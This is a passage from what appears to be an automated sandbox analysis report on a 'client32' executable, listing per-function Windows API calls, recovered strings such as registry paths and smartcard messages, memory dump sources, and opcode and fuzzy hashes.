                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 1216912278-1557312927
                                                        • Opcode ID: 97d3c940d63b297fb10f83f3dfb68609f49cd421d87f9b9cd799dfe9b4fbcbfc
                                                        • Instruction ID: 9d934249f53fa8d366fcc49e738241deeb513e329cffd45cc01f0ae030ad81d4
                                                        • Opcode Fuzzy Hash: 97d3c940d63b297fb10f83f3dfb68609f49cd421d87f9b9cd799dfe9b4fbcbfc
                                                        • Instruction Fuzzy Hash: 3E118F76A00614BFE711CBA0CC85FAEF3BCEB88704F108129F50697180EA70B904CB65
                                                        Function 1100B270 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InterlockedDecrement.KERNEL32(?), ref: 1100B280
                                                        • EnterCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2B9
                                                        • EnterCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2D8
                                                          • Part of subcall function 1100A1E0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A1FE
                                                          • Part of subcall function 1100A1E0: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A228
                                                          • Part of subcall function 1100A1E0: GetLastError.KERNEL32 ref: 1100A230
                                                          • Part of subcall function 1100A1E0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A244
                                                          • Part of subcall function 1100A1E0: CloseHandle.KERNEL32(00000000), ref: 1100A24B
                                                        • waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BE6B,?,00000000,00000002), ref: 1100B2E8
                                                        • LeaveCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2EF
                                                        • _free.LIBCMT ref: 1100B2F8
                                                        • _free.LIBCMT ref: 1100B2FE
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                        • String ID:
                                                        • API String ID: 705253285-0
                                                        • Opcode ID: 58f407269e751de9f91f6fa657191078a7fc4bd98738b10eb03c05d2ca273642
                                                        • Instruction ID: b53c431c1fdfdfa32c825fd1fca90191d00be8cf6b766cb547cd0a2bc680ebd8
                                                        • Opcode Fuzzy Hash: 58f407269e751de9f91f6fa657191078a7fc4bd98738b10eb03c05d2ca273642
                                                        • Instruction Fuzzy Hash: 4211827A900B15AFE712CE60DC88BEFB3ACEF4A399F004529FA2656140D770B541CB61
                                                        Function 110AF330 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetMenu.USER32(?), ref: 110AF354
                                                        • GetSubMenu.USER32(00000000,00000002), ref: 110AF35D
                                                        • GetMenuItemCount.USER32(00000000), ref: 110AF366
                                                        • DeleteMenu.USER32(00000000,00000000,00000400,00000000,00000000,?,?,?,110B3F22,75A37C34,?), ref: 110AF388
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110AF33E
                                                        • m_hWnd, xrefs: 110AF343
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Menu$CountDeleteErrorExitItemLastMessageProcesswsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 2484136202-1557312927
                                                        • Opcode ID: bcacf5f189fccd2e56c6c5f12fc971f734e75ed69440acf96920cd341ab3bb06
                                                        • Instruction ID: 740f4026c9f67b21facb63a7154dcb50d19f95f0e9da13a6ec497569553e537b
                                                        • Opcode Fuzzy Hash: bcacf5f189fccd2e56c6c5f12fc971f734e75ed69440acf96920cd341ab3bb06
                                                        • Instruction Fuzzy Hash: 4FF0EC73D41720BFD3129AB0AC88F8DF398BB49759F048929F601E71C4D7645841C7A5
                                                        Function 110033E0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadMenuA.USER32(00000000,00002EF1), ref: 110033ED
                                                        • GetSubMenu.USER32(00000000,00000000), ref: 11003413
                                                        • DestroyMenu.USER32(00000000), ref: 11003442
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                        • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                        • API String ID: 468487828-934300333
                                                        • Opcode ID: df64ea0d2fae3ecbce4d898b4dfec4b1ea76ad89041e8687394a6c81806b7d14
                                                        • Instruction ID: 1cad6fc9c95bf05f50b6ce3caf6643c8411129ac664c74d8947400ee595e6a5d
                                                        • Opcode Fuzzy Hash: df64ea0d2fae3ecbce4d898b4dfec4b1ea76ad89041e8687394a6c81806b7d14
                                                        • Instruction Fuzzy Hash: A9F0A73EE5456237D9136265AC09F8FB6D4CB965ADF058031F800BA685EA20B40145F5
                                                        Function 110032F0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadMenuA.USER32(00000000,00002EFD), ref: 110032FD
                                                        • GetSubMenu.USER32(00000000,00000000), ref: 11003323
                                                        • DestroyMenu.USER32(00000000), ref: 11003352
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                        • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                        • API String ID: 468487828-934300333
                                                        • Opcode ID: cb8f0810ee07e3752238a0c809691a2f2e075db7e03e247ef5e11464e5e03cf9
                                                        • Instruction ID: d45ddfe76467ef9f778f5ab9a3906980c2d231470f314a4c50cab6afe01776b3
                                                        • Opcode Fuzzy Hash: cb8f0810ee07e3752238a0c809691a2f2e075db7e03e247ef5e11464e5e03cf9
                                                        • Instruction Fuzzy Hash: 25F0A03EE5466227D9136665AC4AF8FBBD5CB966AAF048031F800E6384EA20A40145B5
                                                        Function 1105D390 Relevance: 9.1, APIs: 6, Instructions: 97timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __time64.LIBCMT ref: 1105D3A6
                                                          • Part of subcall function 111521E3: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,11104EFA,?,00000000,00000001,00020001,?,?,currentver,?), ref: 111521EE
                                                          • Part of subcall function 111521E3: __aulldiv.LIBCMT ref: 1115220E
                                                        • __localtime64.LIBCMT ref: 1105D3AF
                                                          • Part of subcall function 11154DED: __localtime64_s.LIBCMT ref: 11154E02
                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 1105D438
                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 1105D442
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1105D463
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1105D471
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Time$FileSystem$Unothrow_t@std@@@__ehfuncinfo$??2@$__aulldiv__localtime64__localtime64_s__time64
                                                        • String ID:
                                                        • API String ID: 667980571-0
                                                        • Opcode ID: baf43ef1593a7cdecb94672a433a1750632353f139cf7ae1fa9ef072f7b28b7a
                                                        • Instruction ID: c1e4814d99555f495de290984051ba4bd9ed83c2fedc9342f642c632bc13bcf0
                                                        • Opcode Fuzzy Hash: baf43ef1593a7cdecb94672a433a1750632353f139cf7ae1fa9ef072f7b28b7a
                                                        • Instruction Fuzzy Hash: 3E317C76D1021CABCF44DFE8DC41AEEF7B8EF48314F04812AE815B7240EA746A04CBA5
                                                        Function 1103F120 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 1103F1C5
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • NO VALID SMARTCARD DEVICE!!!, xrefs: 1103F1DB
                                                        • CLTCONN.CPP, xrefs: 1103F1A0
                                                        • Error %d writing to smartcard device, xrefs: 1103F1CC
                                                        • transferred == datalen, xrefs: 1103F1A5
                                                        • Written %u bytes to smartcard device, xrefs: 1103F1B6
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$ExitMessageProcesswsprintf
                                                        • String ID: CLTCONN.CPP$Error %d writing to smartcard device$NO VALID SMARTCARD DEVICE!!!$Written %u bytes to smartcard device$transferred == datalen
                                                        • API String ID: 73808336-3603962039
                                                        • Opcode ID: 94856a4078b3ac11fe05ef5c0c08bd18a798151c73576af9460396963e9f6036
                                                        • Instruction ID: d1e1036eaa595ab7b5070c6635154fdad5e0fb19e25623191bbb8a120220dee9
                                                        • Opcode Fuzzy Hash: 94856a4078b3ac11fe05ef5c0c08bd18a798151c73576af9460396963e9f6036
                                                        • Instruction Fuzzy Hash: 3821B0B6900509AFCB00CF54ED41FDEF775EB95729F008269FC1567380EB30AA04CAA2
                                                        Function 1115F0C2 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • __getptd.LIBCMT ref: 1115F0CE
                                                          • Part of subcall function 1115A195: __getptd_noexit.LIBCMT ref: 1115A198
                                                          • Part of subcall function 1115A195: __amsg_exit.LIBCMT ref: 1115A1A5
                                                        • __amsg_exit.LIBCMT ref: 1115F0EE
                                                        • __lock.LIBCMT ref: 1115F0FE
                                                        • InterlockedDecrement.KERNEL32(?), ref: 1115F11B
                                                        • _free.LIBCMT ref: 1115F12E
                                                        • InterlockedIncrement.KERNEL32(02D01688), ref: 1115F146
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                        • String ID:
                                                        • API String ID: 3470314060-0
                                                        • Opcode ID: e40253f875d940b7a8dc3236e0f89e6710caf89b4cb49835c4960a95df8dfdc6
                                                        • Instruction ID: 803fd973862948a3a3ecb7a001aea24e080d02acdb4679c2f1c74669b507a754
                                                        • Opcode Fuzzy Hash: e40253f875d940b7a8dc3236e0f89e6710caf89b4cb49835c4960a95df8dfdc6
                                                        • Instruction Fuzzy Hash: 3D018436901B339BDBD29F65C48974DF760AB0772CF188555E830A7284CB746942CFD2
                                                        Function 1105F340 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 122COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • CalledControl connectCB (ConnectToClient), xrefs: 1105F3C3
                                                        • Processing EV_CALLED_CONTROL s=%d, addr=%s, xtra=%s..., xrefs: 1105F39A
                                                        • CalledControl queuing connectCB, xrefs: 1105F3FE
                                                        • Processed EV_CALLED_CONTROL s=%d, addr=%s, xrefs: 1105F483
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID: CalledControl connectCB (ConnectToClient)$CalledControl queuing connectCB$Processed EV_CALLED_CONTROL s=%d, addr=%s$Processing EV_CALLED_CONTROL s=%d, addr=%s, xtra=%s...
                                                        • API String ID: 269201875-3945191877
                                                        • Opcode ID: a281abe468fc8cf5dea406ee3c8c3c03f4288b3989de67ec6b479d0f55733ec8
                                                        • Instruction ID: eba7aeba7a80585ba5bfcf02ccd4cc4943b90b94df59a5d5031289039a8223e0
                                                        • Opcode Fuzzy Hash: a281abe468fc8cf5dea406ee3c8c3c03f4288b3989de67ec6b479d0f55733ec8
                                                        • Instruction Fuzzy Hash: C64163B9A04A41AFD794CFA4DD44F56F7E4FF44718F10865EE85983280EB74B844CBA2
                                                        Function 110553D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExA.ADVAPI32(-80000002,SOFTWARE\Productive Computer Insight\Client32\AutoReconnect,00000000,00020019,00000000,?,?), ref: 11055450
                                                        • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,00000000,?,?,?,?,?,?), ref: 110554AF
                                                        • RegEnumValueA.ADVAPI32(00000000,00000001,?,?,00000000,?,?,?,?,?), ref: 11055521
                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?), ref: 1105552E
                                                        Strings
                                                        • SOFTWARE\Productive Computer Insight\Client32\AutoReconnect, xrefs: 11055409, 11055444
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: EnumValue$CloseOpen
                                                        • String ID: SOFTWARE\Productive Computer Insight\Client32\AutoReconnect
                                                        • API String ID: 3785232357-4133889954
                                                        • Opcode ID: 522fb6f12ae8a7514099b8464e6d3ecc568f065a2cd26f1cbba31b508d85541a
                                                        • Instruction ID: 4fc8b8c254a8e03eea46efce211ec302a356c8092de060a52f9bb50f925273d8
                                                        • Opcode Fuzzy Hash: 522fb6f12ae8a7514099b8464e6d3ecc568f065a2cd26f1cbba31b508d85541a
                                                        • Instruction Fuzzy Hash: F0416672E112299FEB54CF54CC91FDAB7B8AB49704F4042D9E60DE7180EA716E44CFA1
                                                        Function 110D3610 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • std::exception::exception.LIBCMT ref: 110D3704
                                                        • __CxxThrowException@8.LIBCMT ref: 110D3719
